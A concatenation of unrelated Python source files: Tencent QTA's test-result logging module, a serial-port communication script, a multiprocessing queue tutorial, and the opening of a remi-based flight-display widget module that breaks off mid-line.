# -*- coding: utf-8 -*- # # Tencent is pleased to support the open source community by making QTA available. # Copyright (C) 2016THL A29 Limited, a Tencent company. All rights reserved. # Licensed under the BSD 3-Clause License (the "License"); you may not use this # file except in compliance with the License. You may obtain a copy of the License at # # https://opensource.org/licenses/BSD-3-Clause # # Unless required by applicable law or agreed to in writing, software distributed # under the License is distributed on an "AS IS" basis, WITHOUT WARRANTIES OR CONDITIONS # OF ANY KIND, either express or implied. See the License for the specific language # governing permissions and limitations under the License. # ''' 测试结果模块 参考logging模块的设计,使用示例如下:: result = TestResult() result.add_handler(StreamResultHandler()) result.begin_test() result.start_step('a step') result.info('test') result.end_test() 其中result.info接口可以传record扩展信息,比如:: result.error('', '异常发生', traceback=traceback.format_exc()) 同logger一样,TestResult对象保证对所有的ITestResultHandler的调用都是线程安全的,可以通过实现 ITestResultHandler来实现一个新的Handler,详细请参考ITestResultHandler接口 ''' import sys import traceback import time import xml.dom.minidom as dom import xml.parsers.expat as xmlexpat import xml.sax.saxutils as saxutils import socket import threading import codecs import os import locale import json from testbase import context from testbase.util import _to_unicode, _to_utf8, get_thread_traceback, get_method_defined_class os_encoding = locale.getdefaultlocale()[1] class EnumLogLevel(object): '''日志级别 ''' DEBUG = 10 INFO = 20 Environment = 21 #测试环境相关信息, device/devices表示使用的设备、machine表示执行的机器 ENVIRONMENT = Environment RESOURCE = 22 WARNING = 30 ERROR = 40 ASSERT = 41 #断言失败,actual/expect/code_location CRITICAL = 60 APPCRASH = 61 #测试目标Crash TESTTIMEOUT = 62 #测试执行超时 RESNOTREADY = 69 #当前资源不能满足测试执行的要求 levelname = {} for name in EnumLogLevel.__dict__: value = EnumLogLevel.__dict__[name] if isinstance(value, int): levelname[value] = name def _convert_timelength(sec): h = int(sec / 3600) sec -= h * 3600 m = int(sec / 60) sec -= m * 60 return (h, m, sec) def _to_utf8_by_lines( s ): '''将任意字符串转换为UTF-8编码 ''' lines = [] for line in s.split('\n'): lines.append(_to_utf8(line)) return '\n'.join(lines) class TestResultBase(object): '''测试结果基类 此类的职责如下: 1、提供测试结果基本接口 2、保证线程安全 2、测试是否通过之逻辑判断 ''' def __init__(self): '''构造函数 ''' self.__lock = threading.RLock() self.__steps_passed = [True] #预设置一个,以防用例中没调用startStep self.__curr_step = 0 self.__accept_result = False self.__testcase = None self.__begin_time = None self.__end_time = None self.__error_level = None @property def testcase(self): '''对应的测试用例 :returns: TestCase ''' return self.__testcase @property def passed(self): '''测试是否通过 :returns: True or False ''' return reduce(lambda x,y: x and y, self.__steps_passed) @property def failed_reason(self): '''用例测试不通过的错误原因 :returns: str ''' if self.__error_level: return levelname.get(self.__error_level, 'unknown') else: return '' @property def begin_time(self): '''测试用例开始时间 :returns: float ''' return self.__begin_time @property def end_time(self): '''测试用例结束时间 :returns: float ''' return self.__end_time def begin_test(self, testcase ): '''开始执行测试用例 :param testcase: 测试用例 :type testcase: TestCase ''' with self.__lock: if self.__accept_result: raise RuntimeError("此时不可调用begin_test") self.__accept_result = True self.__begin_time = time.time() self.handle_test_begin(testcase) self.__testcase = testcase def end_test(self): '''结束执行测试用例 ''' with self.__lock: if not self.__accept_result: raise RuntimeError("此时不可调用end_test") self.handle_step_end(self.__steps_passed[self.__curr_step]) self.__end_time = time.time() self.handle_test_end(self.passed) #防止没有一个步骤 self.__accept_result = False def begin_step(self, msg ): '''开始一个测试步骤 :param msg: 测试步骤名称 :type msg: string ''' with self.__lock: if not self.__accept_result: raise RuntimeError("此时不可调用begin_step") if len(self.__steps_passed) != 1: self.handle_step_end(self.__steps_passed[self.__curr_step]) self.__steps_passed.append(True) self.__curr_step += 1 self.handle_step_begin(msg) def log_record(self, level, msg, record=None, attachments=None ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' if record is None: record = {} if attachments is None: attachments = {} if not isinstance(msg,(str,unicode)): raise ValueError("msg必须是unicode或str类型") if isinstance(msg, unicode): msg = msg.encode('utf8') if level >= EnumLogLevel.ERROR: self.__steps_passed[self.__curr_step] = False if level > self.__error_level: self.__error_level = level extra_record, extra_attachments = self._get_extra_fail_record_safe() record.update(extra_record) attachments.update(extra_attachments) with self.__lock: if not self.__accept_result: return self.handle_log_record(level, msg, record, attachments) def _get_extra_fail_record_safe(self,timeout=300): '''使用线程调用测试用例的get_extra_fail_record ''' def _run(outputs, errors): try: outputs.append(context.current_testcase().get_extra_fail_record()) except: errors.append(traceback.format_exc()) errors = [] outputs = [] t = threading.Thread(target=_run, args=(outputs, errors)) t.daemon = True t.start() t.join(timeout) extra_record, extra_attachments = {}, {} with self.__lock: if t.is_alive(): stack=get_thread_traceback(t) self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息超过了指定时间:%ds' % timeout, {'traceback':stack}, {}) else: if errors: self.handle_log_record(EnumLogLevel.ERROR, '测试失败时获取其他额外错误信息失败', {'traceback':errors[0]}, {}) else: record_info = outputs[0] if isinstance(record_info, (tuple,list)) and len(record_info) == 2: extra_record, extra_attachments = record_info else: cls = get_method_defined_class(self.testcase.get_extra_fail_record) if cls.__module__ == '__main__': class_path = cls.__name__ else: class_path = "%s.%s" % (cls.__module__,cls.__name__) raise RuntimeError("%s.get_extra_fail_record must return a 2 elements tuple" % class_path) return extra_record, extra_attachments def debug(self, msg, record=None, attachments=None): '''处理一个DEBUG日志 ''' self.log_record(EnumLogLevel.DEBUG, msg, record, attachments) def info(self, msg, record=None, attachments=None): '''处理一个INFO日志 ''' self.log_record(EnumLogLevel.INFO, msg, record, attachments) def warning(self, msg, record=None, attachments=None): '''处理一个WARNING日志 ''' self.log_record(EnumLogLevel.WARNING, msg, record, attachments) def error(self, msg, record=None, attachments=None): '''处理一个ERROR日志 ''' self.log_record(EnumLogLevel.ERROR, msg, record, attachments) def exception(self, msg, record=None, attachments=None): '''处理一个DEBUG日志 ''' if record is None: record = {} record['traceback'] = traceback.format_exc() self.log_record(EnumLogLevel.CRITICAL, msg, record, attachments) def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' pass def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' pass def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' pass def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' pass def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' pass class EmptyResult(TestResultBase): '''不输出 ''' pass class StreamResult(TestResultBase): '''测试用例stream输出 ''' _seperator1 = "-" * 40 + "\n" _seperator2 = "=" * 60 + "\n" def __init__(self, stream=sys.stdout): '''构造函数 :param stream: 流对象 :type stream: file ''' super(StreamResult, self).__init__() self._stream = stream if stream.encoding and stream.encoding != 'utf8': if stream.encoding.lower().startswith('ansi'): #fix Linux下可能出现编码为ANSI*的情况 self._write = self._stream.write else: self._write = lambda x: self._stream.write(x.decode('utf8').encode(stream.encoding)) else: self._write = self._stream.write self._step_results = [] def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self._write(self._seperator2) owner = getattr(testcase, 'owner', None) priority = getattr(testcase, 'priority', None) timeout = getattr(testcase, 'timeout', None) self._write("测试用例:%s 所有者:%s 优先级:%s 超时:%s分钟\n" % (testcase.test_name, owner, priority, timeout)) self._write(self._seperator2) def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._write(self._seperator2) self._write("测试用例开始时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))) self._write("测试用例结束时间: %s\n" % time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time))) self._write("测试用例执行时间: %02d:%02d:%02.2f\n" % _convert_timelength(self.end_time - self.begin_time)) rsttxts = {True:'通过', False:'失败'} steptxt = '' for i, ipassed in enumerate(self._step_results): steptxt += " %s:%s" % (i+1, rsttxts[ipassed]) self._write("测试用例步骤结果: %s\n" % steptxt) self._write("测试用例最终结果: %s\n" % rsttxts[passed]) self._write(self._seperator2) def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' if not isinstance(msg,(str,unicode)): raise ValueError("msg必须是unicode或str类型") self._write(self._seperator1) self._write("步骤%s: %s\n" % (len(self._step_results) + 1, msg)) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' self._step_results.append(passed) def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' self._write("%s: %s\n" % (levelname[level], msg)) if level == EnumLogLevel.ASSERT: if record.has_key("actual"): actual=record["actual"] self._write(" 实际值:%s%s\n" % (actual.__class__,actual)) if record.has_key("expect"): expect=record["expect"] self._write(" 期望值:%s%s\n" % (expect.__class__,expect)) if record.has_key("code_location"): self._write(_to_utf8(' File "%s", line %s, in %s\n' % record["code_location"])) if record.has_key("traceback"): self._write(_to_utf8_by_lines("%s\n" % record["traceback"])) for name in attachments: file_path = attachments[name] if os.path.exists(_to_unicode(file_path)): file_path = os.path.realpath(file_path) self._write(" %s:%s\n" % (name, _to_utf8(file_path))) class XmlResult(TestResultBase): '''xml格式的测试用例结果 ''' def __init__(self, file_path=None ): '''构造函数 :param file_path: XML文件路径 :type file_path: string ''' super(XmlResult, self).__init__() self._xmldoc = dom.Document() self._file_path = file_path @property def file_path(self): '''xml文件路径 :returns: str ''' return self._file_path def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self._xmldoc.appendChild(self._xmldoc.createProcessingInstruction("xml-stylesheet", 'type="text/xsl" href="TestResult.xsl"')) owner = getattr(testcase, 'owner', None) priority = getattr(testcase, 'priority', None) timeout = getattr(testcase, 'timeout', None) self._testnode = self._xmldoc.createElement('TEST') self._testnode.setAttribute("name", _to_utf8(saxutils.escape(testcase.test_name))) self._testnode.setAttribute("owner", _to_utf8(saxutils.escape(str(owner)))) self._testnode.setAttribute("priority", str(priority)) self._testnode.setAttribute("timeout", str(timeout)) self._testnode.setAttribute('begintime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time))) self._xmldoc.appendChild(self._testnode) self.begin_step('测试用例初始步骤') def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._testnode.setAttribute('result', str(passed)) self._testnode.setAttribute('endtime', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.end_time))) self._testnode.setAttribute('duration', "%02d:%02d:%02.2f\n" % _convert_timelength(self.end_time- self.begin_time)) if self._file_path: with codecs.open(self._file_path.decode('utf8'), 'w') as fd: fd.write(self.toxml()) def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' if not isinstance(msg, (str,unicode)): raise ValueError("msg必须是str或unicode类型") self._stepnode = self._xmldoc.createElement("STEP") self._stepnode.setAttribute('title', _to_utf8(msg)) self._stepnode.setAttribute('time', time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(time.time()))) self._testnode.appendChild(self._stepnode) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' self._stepnode.setAttribute('result', str(passed)) def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' if not isinstance(msg, basestring): msg = str(msg) #由于目前的报告系统仅支持部分级别的标签,所以这里先做转换 if level >= EnumLogLevel.ERROR: tagname = levelname[EnumLogLevel.ERROR] elif level == EnumLogLevel.Environment or level == EnumLogLevel.RESOURCE: tagname = levelname[EnumLogLevel.INFO] else: tagname = levelname[level] infonode = self._xmldoc.createElement(tagname) textnode = self._xmldoc.createTextNode(_to_utf8(msg)) infonode.appendChild(textnode) self._stepnode.appendChild(infonode) if level == EnumLogLevel.ASSERT: if record.has_key("actual"): node = self._xmldoc.createElement("ACTUAL") try: actual=record["actual"] if isinstance(actual, basestring): dom.parseString("<a>%s</a>" % actual) acttxt = "%s%s" % (actual.__class__,actual) except xmlexpat.ExpatError: acttxt = "%s%s" % (actual.__class__,repr(actual)) except UnicodeEncodeError: acttxt = "%s%s" % (actual.__class__,repr(actual)) node.appendChild(self._xmldoc.createTextNode(acttxt)) infonode.appendChild(node) if record.has_key("expect"): node = self._xmldoc.createElement("EXPECT") try: expect=record["expect"] if isinstance(expect, basestring): dom.parseString("<a>%s</a>" % expect) exptxt = "%s%s" % (expect.__class__,expect) except xmlexpat.ExpatError: exptxt = "%s%s" % (expect.__class__,repr(expect)) except UnicodeEncodeError: exptxt = "%s%s" % (expect.__class__,repr(expect)) node.appendChild(self._xmldoc.createTextNode(exptxt)) infonode.appendChild(node) if record.has_key("traceback"): excnode = self._xmldoc.createElement('EXCEPT') excnode.appendChild(self._xmldoc.createTextNode(_to_utf8(record["traceback"]))) infonode.appendChild(excnode) for name in attachments: file_path = attachments[name] attnode = self._xmldoc.createElement('ATTACHMENT') attnode.setAttribute('filepath', _to_utf8(file_path)) attnode.appendChild(self._xmldoc.createTextNode(_to_utf8(name))) infonode.appendChild(attnode) def toxml(self): '''返回xml文本 :returns string - xml文本 ''' return self._xmldoc.toprettyxml(indent=" ", newl="\n") class JSONResult(TestResultBase): '''JSON格式的结果 ''' def __init__(self, testcase): super(JSONResult, self).__init__() self._steps = [] self._data = { "testcase": testcase.test_name, "description": testcase.test_doc, "owner": testcase.owner, "priority": testcase.priority, "status": testcase.status, "steps": self._steps } def get_data(self): return self._data def handle_test_begin(self, testcase ): '''处理一个测试用例执行的开始 :param testcase: 测试用例 :type testcase: TestCase ''' self.begin_step("测试用例初始化步骤") def handle_test_end(self, passed ): '''处理一个测试用例执行的结束 :param passed: 测试用例是否通过 :type passed: boolean ''' self._data["succeed"] = passed self._data["start_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)), self._data["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime(self.begin_time)), def handle_step_begin(self, msg ): '''处理一个测试步骤的开始 :param msg: 测试步骤名称 :type msg: string ''' self._steps.append({ "name": msg, "start_time": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), "logs": [] }) def handle_step_end(self, passed ): '''处理一个测试步骤的结束 :param passed: 测试步骤是否通过 :type passed: boolean ''' curr_step = self._steps[-1] curr_step["succeed"] = passed curr_step["end_time"] = time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), def handle_log_record(self, level, msg, record, attachments ): '''处理一个日志记录 :param level: 日志级别,参考EnumLogLevel :type level: string :param msg: 日志消息 :type msg: string :param record: 日志记录 :type record: dict :param attachments: 附件 :type attachments: dict ''' print self._steps print level, msg, record, attachments curr_step = self._steps[-1] curr_step["logs"].append({ "timestamp": time.strftime("%Y-%m-%d %H:%M:%S", time.localtime()), "level": level, "message": msg, "record": record, "attachments": attachments }) class TestResultCollection(list): '''测试结果集合 ''' def __init__(self, results, passed ): '''构造函数 :param results: 测试结果列表 :type results: list :param passed: 测试是否通过 :type passed: boolean ''' super(TestResultCollection, self).__init__(results) self.__passed = passed @property def passed(self): '''测试是否通过 :returns: boolean ''' return self.__passed from xml.dom import minidom
comunicationTest.py
import serial import threading from time import sleep serial_port = serial.Serial() def read(): while True: data = serial_port.read(9999999999) if len(data) > 0: print('Got:{}'.format(data)) def main(): try: serial_port.baudrate = 9600 serial_port.port = 'COM7' serial_port.timeout = 0 if serial_port.isOpen(): serial_port.close() serial_port.open() t1 = threading.Thread(target=read, args=()) t1.start() while True: try: command = input() command = bytearray(command, 'utf-8') serial_port.write(command) except KeyboardInterrupt: break serial_port.close() except Exception as e: print(e) finally: pass if __name__ == "__main__": main()
033.py
#!/usr/bin/python # -*- coding: utf-8 -*- ''' 进程间通信 ''' from multiprocessing import Process, Queue import os, time, random # 写数据进程执行的代码: def write(q): print('Process to write: %s' % os.getpid()) for value in ['A', 'B', 'C']: print('Put %s to queue...' % value) q.put(value) time.sleep(random.random()) # 读数据进程执行的代码: def read(q): print('Process to read: %s' % os.getpid()) while True: value = q.get(True) print('Get %s from queue.' % value) if __name__=='__main__': # 父进程创建Queue,并传给各个子进程: q = Queue() pw = Process(target=write, args=(q,)) pr = Process(target=read, args=(q,)) # 启动子进程pw,写入: pw.start() # 启动子进程pr,读取: pr.start() # 等待pw结束: pw.join() # pr进程里是死循环,无法等待其结束,只能强行终止: pr.terminate()
PFD.py
# -*- coding: utf-8 -*- from remi import gui from remi import start, App import math import threading import time class AsciiContainer(gui.Container): widget_layout_map = None def __init__(self, *args, **kwargs): gui.Container.__init__(self, *args, **kwargs) self.css_position = 'relative' def set_from_asciiart(self, asciipattern, gap_horizontal=0, gap_vertical=0): """ asciipattern (str): a multiline string representing the layout | widget1 | | widget1 | | widget2 | widget3 | gap_horizontal (int): a percent value gap_vertical (int): a percent value """ pattern_rows = asciipattern.split('\n') # remove empty rows for r in pattern_rows[:]: if len(r.replace(" ", "")) < 1: pattern_rows.remove(r) layout_height_in_chars = len(pattern_rows) self.widget_layout_map = {} row_index = 0 for row in pattern_rows: row = row.strip() row_width = len(row) - row.count('|') #the row width is calculated without pipes row = row[1:-1] #removing |pipes at beginning and end columns = row.split('|') left_value = 0 for column in columns: widget_key = column.strip() widget_width = float(len(column)) if not widget_key in self.widget_layout_map.keys(): #width is calculated in percent # height is instead initialized at 1 and incremented by 1 each row the key is present # at the end of algorithm the height will be converted in percent self.widget_layout_map[widget_key] = { 'width': "%.2f%%"%float(widget_width / (row_width) * 100.0 - gap_horizontal), 'height':1, 'top':"%.2f%%"%float(row_index / (layout_height_in_chars) * 100.0 + (gap_vertical/2.0)), 'left':"%.2f%%"%float(left_value / (row_width) * 100.0 + (gap_horizontal/2.0))} else: self.widget_layout_map[widget_key]['height'] += 1 left_value += widget_width row_index += 1 #converting height values in percent string for key in self.widget_layout_map.keys(): self.widget_layout_map[key]['height'] = "%.2f%%"%float(self.widget_layout_map[key]['height'] / (layout_height_in_chars) * 100.0 - gap_vertical) for key in self.widget_layout_map.keys(): self.set_widget_layout(key) def append(self, widget, key=''): key = gui.Container.append(self, widget, key) self.set_widget_layout(key) return key def set_widget_layout(self, widget_key): if not ((widget_key in self.children.keys() and (widget_key in self.widget_layout_map.keys()))): return self.children[widget_key].css_position = 'absolute' self.children[widget_key].set_size(self.widget_layout_map[widget_key]['width'], self.widget_layout_map[widget_key]['height']) self.children[widget_key].css_left = self.widget_layout_map[widget_key]['left'] self.children[widget_key].css_top = self.widget_layout_map[widget_key]['top'] class SimpleVSI(gui.SvgGroup): value = 0 def __init__(self, x_pos, y_pos, wide, high, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.wide = wide self.high = high self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-self.wide, -self.high/2, wide, high) self.subcontainer.set_viewbox(-self.wide/2, -self.high/2, wide, self.high) self.append(self.subcontainer) vertical_line_width = self.wide/20 scale_vertical_line = gui.SvgLine(-self.wide/2, -self.high/2, -self.wide/2, self.high) scale_vertical_line.set_stroke(vertical_line_width, 'lightgray') self.subcontainer.append(scale_vertical_line) self.pointer_line = gui.SvgLine(self.wide/2, 0, -self.wide/2, self.value*(self.high/2)) self.pointer_line.set_stroke(self.wide / 14, 'lightgray') self.subcontainer.append(self.pointer_line) self.value_max = gui.SvgText(-self.wide/2 + vertical_line_width, -self.high/2, "10") self.value_max.attr_dominant_baseline = 'hanging' self.value_max.attr_text_anchor = 'start' self.value_max.set_fill('white') self.value_max.css_font_size = gui.to_pix(0.3*self.wide) self.value_max.css_font_weight = 'bolder' #self.value_max.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.subcontainer.append(self.value_max) self.value_min = gui.SvgText(-self.wide/2 + vertical_line_width, self.high/2, "-10") self.value_min.attr_dominant_baseline = 'ideographic' self.value_min.attr_text_anchor = 'start' self.value_min.set_fill('white') self.value_min.css_font_size = gui.to_pix(0.3*self.wide) self.value_min.css_font_weight = 'bolder' #self.value_min.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.subcontainer.append(self.value_min) def set_value(self, value): self.value = value self.pointer_line.set_coords(self.wide/2, 0, -self.wide/2, -self.value*(self.high/2)/10) class TapeVertical(gui.SvgGroup): value = 0 scale_length = 1000 scale_length_visible = 100 subcontainer = None #contains the moving scale pointer_with_value_group = None #contains the static pointer with actual value wide = 0 high = 0 left_side = True indicator_size = 0 tape_white_min = 0 tape_white_max = 0 tape_green_min = 0 tape_green_max = 0 def __init__(self, x_pos, y_pos, wide, high, left_side, scale_length, scale_length_visible, tape_white_min=0, tape_white_max=0, tape_green_min=0, tape_green_max=0, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.scale_length = scale_length self.scale_length_visible = scale_length_visible self.wide = wide self.high = high self.indicator_size = self.wide*0.2 self.left_side = left_side self.tape_white_min = tape_white_min self.tape_white_max = tape_white_max self.tape_green_min = tape_green_min self.tape_green_max = tape_green_max self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-wide if self.left_side else 0, -self.high/2, wide, high) self.subcontainer.set_viewbox(-self.wide/2, -self.scale_length_visible/2, wide, self.scale_length_visible) self.append(self.subcontainer) self.group_indicator = gui.SvgGroup() self.group_scale = gui.SvgGroup() self.build_scale() self.group_indicator.append(self.group_scale) self.subcontainer.append(self.group_indicator) #self.group_indicator.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.pointer = gui.SvgPolygon(5) self.pointer.set_fill('black') self.pointer.set_stroke(0.02*self.scale_length_visible, 'red') direction = (-1 if self.left_side else 1) pointer_x = 0 #(-self.wide if self.left_side else 0) pointer_width = self.wide self.pointer.add_coord(pointer_x, 0) self.pointer.add_coord(pointer_x+((0.2*self.wide)*direction), 0.2*self.wide) self.pointer.add_coord(pointer_x+pointer_width*direction, 0.2*self.wide) self.pointer.add_coord(pointer_x+pointer_width*direction, -0.2*self.wide) self.pointer.add_coord(pointer_x+((0.2*self.wide)*direction), -0.2*self.wide) #self.pointer.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.pointer) self.pointer_value = gui.SvgText(((0-self.indicator_size) if self.left_side else (self.wide-0.05*self.wide)), 0, "%d"%(self.value%360)) self.pointer_value.attr_dominant_baseline = 'middle' self.pointer_value.attr_text_anchor = 'end' if self.left_side else 'end' self.pointer_value.set_fill('lime') self.pointer_value.css_font_size = gui.to_pix(0.3*self.wide) self.pointer_value.css_font_weight = 'bolder' #self.pointer_value.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.pointer_value) if self.tape_green_max > 0: green_and_red_tape_width = self.wide white_tape_width = 3 tape_green = gui.SvgRectangle(-self.wide/2, -self.tape_green_max, green_and_red_tape_width, (self.tape_green_max-self.tape_green_min)) tape_green.set_fill('green') self.group_scale.add_child('tape_green', tape_green) if self.tape_white_max > 0: tape_white = gui.SvgRectangle((self.wide/2-white_tape_width if self.left_side else -self.wide/2), -self.tape_white_max, white_tape_width, (self.tape_white_max-self.tape_white_min)) tape_white.set_fill('white') self.group_scale.add_child('tape_white', tape_white) if self.tape_green_max > 0: tape_red = gui.SvgRectangle(-self.wide/2, -self.scale_length, green_and_red_tape_width, (self.scale_length-self.tape_green_max)) tape_red.set_fill('red') self.group_scale.add_child('tape_red', tape_red) def build_scale(self): #self.group_scale.empty() #horizontal line along all the tape size x = self.wide/2 if self.left_side else -self.wide/2 line = gui.SvgLine(x, -self.value-self.scale_length_visible/2, x, -self.value+self.scale_length_visible/2) line.set_stroke(0.1*self.wide, 'gray') self.group_scale.append(line, "line") #creating labels labels = {} labels_size = {} step = 10 for i in range(int(self.value/step -1 -(self.scale_length_visible/step)/2), int(self.value/step + (self.scale_length_visible/step)/2+1)): if not i*step in labels.keys() and i*step>=0: labels[i*step] = "%d"%(i*step) labels_size[i*step] = 1.0 indicator_x = (self.wide/2-self.indicator_size) if self.left_side else (-self.wide/2+self.indicator_size) text_x = ((self.wide/2-self.indicator_size) if self.left_side else (self.wide/2-0.05*self.wide)) content = "" for v in range(int(self.value-self.scale_length_visible/2), int(self.value+self.scale_length_visible/2 +1)): if v in labels.keys(): y = -v """line = gui.SvgLine(indicator_x, y, self.wide/2 if self.left_side else -self.wide/2, y) line.set_stroke(0.03*self.wide, 'gray') self.group_scale.append(line) """ content += """<line class="SvgLine" x1="%(x1)s" y1="%(y1)s" x2="%(x2)s" y2="%(y2)s" stroke="gray" stroke-width="0.6"></line>"""%{'x1':indicator_x, 'y1':y, 'x2':(self.wide/2 if self.left_side else -self.wide/2), 'y2':y} content += """<text class="SvgText" x="%(x)s" y="%(y)s" fill="white" style="dominant-baseline:middle;text-anchor:end;font-size:%(font)s;font-weight:bolder">%(text)s</text>"""%{'x':text_x, 'y':y, 'text':labels.get(v, ''), 'font':gui.to_pix(0.28*self.wide) } """txt = gui.SvgText(text_x, y, labels.get(v, '')) txt.attr_dominant_baseline = 'middle' txt.attr_text_anchor = 'end' if self.left_side else 'end' txt.set_fill('white') txt.css_font_size = gui.to_pix(0.25*self.wide*labels_size[v]) txt.css_font_weight = 'bolder' self.group_scale.append(txt)""" self.group_scale.add_child('content', content) def set_value(self, value): self.value = value self.pointer_value.set_text("%d"%self.value) self.subcontainer.set_viewbox(-self.wide/2, -self.scale_length_visible/2 - self.value, self.wide, self.scale_length_visible) self.build_scale() class OrientationTapeHorizontal(gui.SvgGroup): orientation = 0 scale_length = 720 scale_length_visible = 180 subcontainer = None #contains the moving scale pointer_with_value_group = None #contains the static pointer with actual value wide = 0 high = 0 def __init__(self, x_pos, y_pos, wide, high, *args, **kwargs): """ x_pos and y_pos are coordinates indicated by the pointer, generally at the center of the shown tape """ gui.SvgGroup.__init__(self, *args, **kwargs) self.wide = wide self.high = high self.attributes['transform'] = 'translate(%s %s)'%(x_pos, y_pos) #it is used a subcontainer in order to show only a part of the entire tape self.subcontainer = gui.SvgSubcontainer(-wide/2, 0, wide, high) self.subcontainer.set_viewbox(-self.scale_length_visible/2, 0, self.scale_length_visible, high*(high/wide)) self.append(self.subcontainer) #horizontal line along all the tape size self.group_orientation_indicator = gui.SvgGroup() line = gui.SvgLine(-self.scale_length/2, 0, self.scale_length/2, 0) line.set_stroke(0.005*high, 'white') self.group_orientation_indicator.append(line) #creating labels labels = {0:'N', 90:'E', 180:'S', 270:'W'} labels_size = {0:1.0, 90:1.0, 180:1.0, 270:1.0} for i in range(0, 36+1, 2): if not (i*10) in labels.keys(): labels[i*10] = "%02d"%i labels_size[i*10] = 0.7 for angle in range(int(-self.scale_length/2), int(self.scale_length/2)+1): if angle%360 in labels.keys(): x = angle y = 0.05*self.high * labels_size[angle%360] line = gui.SvgLine(x, 0, x, y) line.set_stroke(1, 'white') self.group_orientation_indicator.append(line) txt = gui.SvgText(x, y, labels.get(angle%360, '')) txt.attr_dominant_baseline = 'hanging' txt.attr_text_anchor = 'middle' txt.set_fill('white') txt.css_font_size = gui.to_pix(7*labels_size[angle%360]) txt.css_font_weight = 'bolder' self.group_orientation_indicator.append(txt) self.subcontainer.append(self.group_orientation_indicator) #self.group_orientation_indicator.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.orientation_pointer = gui.SvgPolygon(3) self.orientation_pointer.set_fill('red') self.orientation_pointer.set_stroke(0.005*self.scale_length_visible, 'black') self.orientation_pointer.add_coord(-0.01*self.scale_length_visible, -0.02*self.high) self.orientation_pointer.add_coord(0.0*self.scale_length_visible, 0.0*self.high) self.orientation_pointer.add_coord(0.01*self.scale_length_visible, -0.02*self.high) #self.orientation_pointer.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.orientation_pointer) self.orientation_value = gui.SvgText(0, -0.03*high, "%d"%(self.orientation%360)) self.orientation_value.attr_dominant_baseline = 'auto' self.orientation_value.attr_text_anchor = 'middle' self.orientation_value.set_fill('white') self.orientation_value.css_font_size = gui.to_pix(0.03*self.scale_length_visible) self.orientation_value.css_font_weight = 'bolder' #orientation_value.attributes['transform'] = 'translate(0 %s)'%(self.vh/2-0.11*self.vh) self.append(self.orientation_value) def set_orientation(self, value): self.orientation = value self.orientation_value.set_text("%d"%(self.orientation%360)) self.subcontainer.set_viewbox(-self.scale_length_visible/2 + self.orientation, 0, self.scale_length_visible, self.high*(self.high/self.wide)) class AttitudeIndicator(gui.SvgSubcontainer): pitch = 0 orientation = 0 roll = 0 pitch_roll_scale_limit = 60 vw = 100 vh = 100 def __init__(self, *args, **kwargs): gui.SvgSubcontainer.__init__(self, -self.vw/2, -self.vh/2, self.vw, self.vh, *args, **kwargs) self.attr_viewBox = "%s %s %s 